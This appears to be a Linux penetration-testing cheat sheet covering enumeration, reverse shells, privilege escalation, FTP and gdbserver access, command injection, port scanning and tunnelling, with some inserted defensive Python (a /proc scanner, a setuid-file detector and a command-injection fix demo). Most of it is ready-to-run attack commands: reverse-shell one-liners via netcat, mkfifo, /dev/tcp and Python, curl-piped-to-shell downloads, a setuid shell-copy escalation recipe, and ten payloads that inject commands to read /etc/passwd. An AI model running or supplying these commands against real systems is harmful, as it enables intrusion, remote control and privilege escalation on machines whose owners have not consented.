HackSheet


Sudo

sudo -l

Enumeration

Script

LinPeas

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Linux Smart Enumeration

curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1

Metasploit

msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'

Docker

curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O

File

Classic

Proc

/proc/ contains useful information about the processes that are currently running.

Directory              Description
/proc/PID/cmdline      Command line arguments (NUL-separated).
/proc/PID/cwd          Link to the current working directory.
/proc/PID/environ      Values of environment variables (NUL-separated).
/proc/PID/exe          Link to the executable of this process.
/proc/PID/fd           Directory containing a link for every open file descriptor.
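The table above is easiest to understand by reading those files yourself. The following is an added example, not code from the original page: it parses the five /proc/PID entries for every process under a given root, and adds a small defender-side check that flags processes whose executable lives in a scratch directory (where the copied shell from the privilege-escalation section below would run from) or was unlinked after start. The `demo()` function builds a constructed /proc look-alike in a temporary directory so the code runs offline; pass the real `/proc` to `scan_proc()` on a live host.

```python
import os
import tempfile
from pathlib import Path

# Scratch locations a legitimately installed program rarely runs from;
# the /tmp/bash_up trick in the privilege-escalation section would land here.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def _read_nul_list(path):
    """cmdline and environ are NUL-separated with a trailing NUL; return the fields."""
    try:
        data = Path(path).read_bytes()
    except (PermissionError, FileNotFoundError):
        return []
    return data.decode(errors="replace").split("\0")[:-1]


def _readlink(path):
    """cwd/exe/fd entries are symlinks; other users' processes are not readable."""
    try:
        return os.readlink(path)
    except (PermissionError, FileNotFoundError):
        return None


def read_proc_entry(proc_root, pid):
    """Collect the /proc/PID fields from the table above for one process."""
    base = Path(proc_root) / str(pid)
    env = {}
    for item in _read_nul_list(base / "environ"):
        key, _, value = item.partition("=")
        env[key] = value
    fds = {}
    try:
        for name in os.listdir(base / "fd"):
            fds[name] = _readlink(base / "fd" / name)
    except (PermissionError, FileNotFoundError):
        pass
    return {
        "pid": pid,
        "cmdline": _read_nul_list(base / "cmdline"),
        "environ": env,
        "cwd": _readlink(base / "cwd"),
        "exe": _readlink(base / "exe"),
        "fd": fds,
    }


def scan_proc(proc_root="/proc"):
    """Read every numeric directory under proc_root (the real /proc by default)."""
    return [read_proc_entry(proc_root, int(d))
            for d in sorted(os.listdir(proc_root)) if d.isdigit()]


def flag_process(info):
    """Reasons a defender would want to look at this process."""
    reasons = []
    exe = info["exe"] or ""
    if exe.startswith(SCRATCH_DIRS):
        reasons.append("executable lives in a world-writable scratch directory")
    if exe.endswith(" (deleted)"):   # the kernel appends this when the binary was unlinked
        reasons.append("executable was unlinked after it started")
    return reasons


def demo():
    """Constructed /proc look-alike in a temp dir (sample data, not a real host)."""
    with tempfile.TemporaryDirectory() as tmp:
        proc = Path(tmp)
        entry = proc / "4242"                      # constructed PID
        (entry / "fd").mkdir(parents=True)
        (entry / "cmdline").write_bytes(b"/tmp/bash_up\0-p\0")
        (entry / "environ").write_bytes(b"HOME=/home/user\0PATH=/usr/bin:/bin\0")
        os.symlink("/home/user", entry / "cwd")
        os.symlink("/tmp/bash_up", entry / "exe")
        os.symlink("/dev/pts/0", entry / "fd" / "0")
        (proc / "self").mkdir()                    # non-numeric entries are skipped, as in /proc
        return [(r["cmdline"], r["exe"], r["cwd"], r["environ"], r["fd"], flag_process(r))
                for r in scan_proc(proc)]


if __name__ == "__main__":
    for row in demo():
        print(row)
```

Running it as root against the real `/proc` lists every process; as an unprivileged user, `exe`, `cwd` and `fd` come back as `None` or empty for processes you do not own, which is exactly the limit an attacker enumerating the box also hits.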

Command

find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/
/sbin/getcap -r / 2>&-

Reverse Shell

Server

nc -lp 4444

reSH

# Client
resh ip 4444
# Server
resh 4444


Netcat

nc ip 4444 -e /bin/bash

Mkfifo

mkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f

Dev

bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'

Python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

TTY Support

bash -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
script -qc /bin/bash /dev/null

rlwrap

rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to add line editing and history to keyboard input for any command. Use it when you cannot spawn a proper TTY.

rlwrap command
# Receiving connection from a reverse shell
rlwrap nc -lnvp port

# Connecting to the victim
rlwrap nc ip port

# -r: put every word seen on input and output on the completion list; -f .: also use rlwrap's own history file as completion words
rlwrap -r -f . nc ip port


Privilege Escalation

/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p
chmod 4755 /bin/bash
bash -p
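The recipe above leaves a setuid copy of a shell lying around, and `find / -user root -executable` from the enumeration section is how both sides look for such files. As an added example (not code from the original page), the scanner below does the defender's version of that search: it walks a tree, collects every regular file with the setuid or setgid bit set, and reports which ones sit outside the standard system directories or are named like a shell. `demo()` builds a constructed sample tree in a temporary directory (one legitimate `usr/bin/passwd`, one planted `tmp/bash_up`); run `report("/")` for a real host. The expected-prefix list and the shell-name heuristic are assumptions chosen for the example.

```python
import os
import stat
import tempfile
from pathlib import Path

# Where distribution-managed setuid programs normally live (relative to the scanned root).
EXPECTED_PREFIXES = ("bin/", "sbin/", "usr/bin/", "usr/sbin/", "usr/lib/", "usr/libexec/")
SHELLS = ("bash", "sh", "dash", "zsh", "ksh")


def find_setid_files(root):
    """Walk root and return every regular file with the setuid or setgid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def classify(root, path):
    """Reasons a setuid/setgid file deserves attention: odd location, or it is a shell copy."""
    rel = path.relative_to(root).as_posix()
    reasons = []
    if not rel.startswith(EXPECTED_PREFIXES):
        reasons.append("outside the standard system directories")
    base = path.name.split("_")[0].split("-")[0]   # bash_up -> bash
    if base in SHELLS:
        reasons.append("setuid copy of a shell")
    return reasons


def report(root):
    """Map each setuid/setgid file (relative path) to its reasons; an empty list means expected."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): classify(root, p) for p in find_setid_files(root)}


def demo():
    """Constructed sample tree in a temp dir: one legitimate SUID binary and one planted shell copy."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        layout = {
            "usr/bin/passwd": 0o4755,      # expected setuid program
            "usr/bin/ls": 0o755,           # ordinary binary, not reported
            "tmp/bash_up": 0o6755,         # what the cp/chown/chmod u+s,g+s recipe above leaves behind
            "home/user/notes.txt": 0o644,  # plain file, not reported
        }
        for rel, mode in layout.items():
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(b"#!/bin/sh\n")   # placeholder content, not a real binary
            os.chmod(path, mode)
        return report(root)


if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(rel, reasons or "expected")
```

Diffing the output of `report("/")` against a baseline taken at install time is the practical use: a new entry under `/tmp`, `/home` or `/var` is the artefact this section's commands create.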

FTP

Port: 21

File Transfer Protocol (FTP) is a TCP/IP application protocol for transferring files between computers: the server exposes directories on the remote host that clients can list, download from and upload to.

Scan

nmap --script 'ftp-*' -p 21 ip

Download all files

wget -m --user=user --password=password ftp://ip
wget -m --user=anonymous --password=anonymous ftp://ip

Gdbserver

Port: 1337

Gdbserver is a program that makes it possible to debug other programs remotely. A copy of the program you want to debug needs to be present on the target system.

$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file

Command Injection

;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "
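Every payload in the list above relies on the application handing user input to a shell. The following added example (not code from the original page) shows the vulnerable pattern and its fix side by side: `vulnerable_echo` concatenates input into a `shell=True` command line, so a benign injected `; echo INJECTED` runs as a second command; `hardened_echo` passes the input as one argv element with no shell, so the same string arrives verbatim. `is_safe_argument` is an allowlist validator (only plain file-name characters) that rejects all ten payloads; the regex is an assumption chosen for the example.

```python
import re
import subprocess
import sys

# The payloads from the list above, kept here as test vectors for the validator.
PAYLOADS = [
    ";{cat,/etc/passwd}",
    ";cat${IFS}/etc/passwd;",
    "; cat /etc/passwd ;",
    "$(cat /etc/passwd)",
    "`cat /etc/passwd`",
    "&& cat /etc/passwd &&",
    "|| cat /etc/passwd ||",
    "< <(cat /etc/passwd)",
    "| cat /etc/passwd",
    '"; cat /etc/passwd "',
]

# Allowlist rather than denylist: a plain file name, no separators, no whitespace, no metacharacters.
SAFE_ARG = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def is_safe_argument(value):
    """True only for plain file names; every shell metacharacter (and '/') fails the allowlist."""
    return SAFE_ARG.fullmatch(value) is not None


def vulnerable_echo(value):
    """The bug: user input concatenated into a shell command line (shell=True)."""
    proc = subprocess.run(f"echo {value}", shell=True, capture_output=True, text=True)
    return proc.stdout.rstrip("\n")


def hardened_echo(value):
    """The fix: argv list, no shell; the child receives the input verbatim as one argument.
    A Python child prints its argv[1] so the result is identical on any platform."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


def rejected_payloads():
    """Which of the payloads above the allowlist validator refuses (all of them)."""
    return [p for p in PAYLOADS if not is_safe_argument(p)]


if __name__ == "__main__":
    sample = "hello; echo INJECTED"
    print("shell=True  :", repr(vulnerable_echo(sample)))
    print("argv list   :", repr(hardened_echo(sample)))
    print("rejected    :", len(rejected_payloads()), "of", len(PAYLOADS))
```

The argv-list form is the fix that matters; the validator is defence in depth for cases where the value still ends up in a path or a log line. Note that `${IFS}` and `{cat,/etc/passwd}` exist precisely to defeat naive denylists that only strip spaces, which is why the validator allows known-good characters instead of removing known-bad ones.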

GTFOBins - Bypass local security restrictions

Network

Netstat

netstat -tulpn

Scan Port

for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null

Scan Ip

for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;

Port Forwarding

Chisel

# Install chisel
curl https://i.jpillora.com/chisel! | bash
# Example: expose the victim's local port 8000 on the attacker machine, tunnelled through a chisel server on 4444

# Attacker machine:
chisel server -p 4444 --reverse

# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000

SSH

ssh -L 8080:127.0.0.1:8080 user@ip

SCP

Download File

scp -P port user@192.168.1.ip:path .

Upload File

scp -P port file user@192.168.1.ip:path

Upload peda

scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda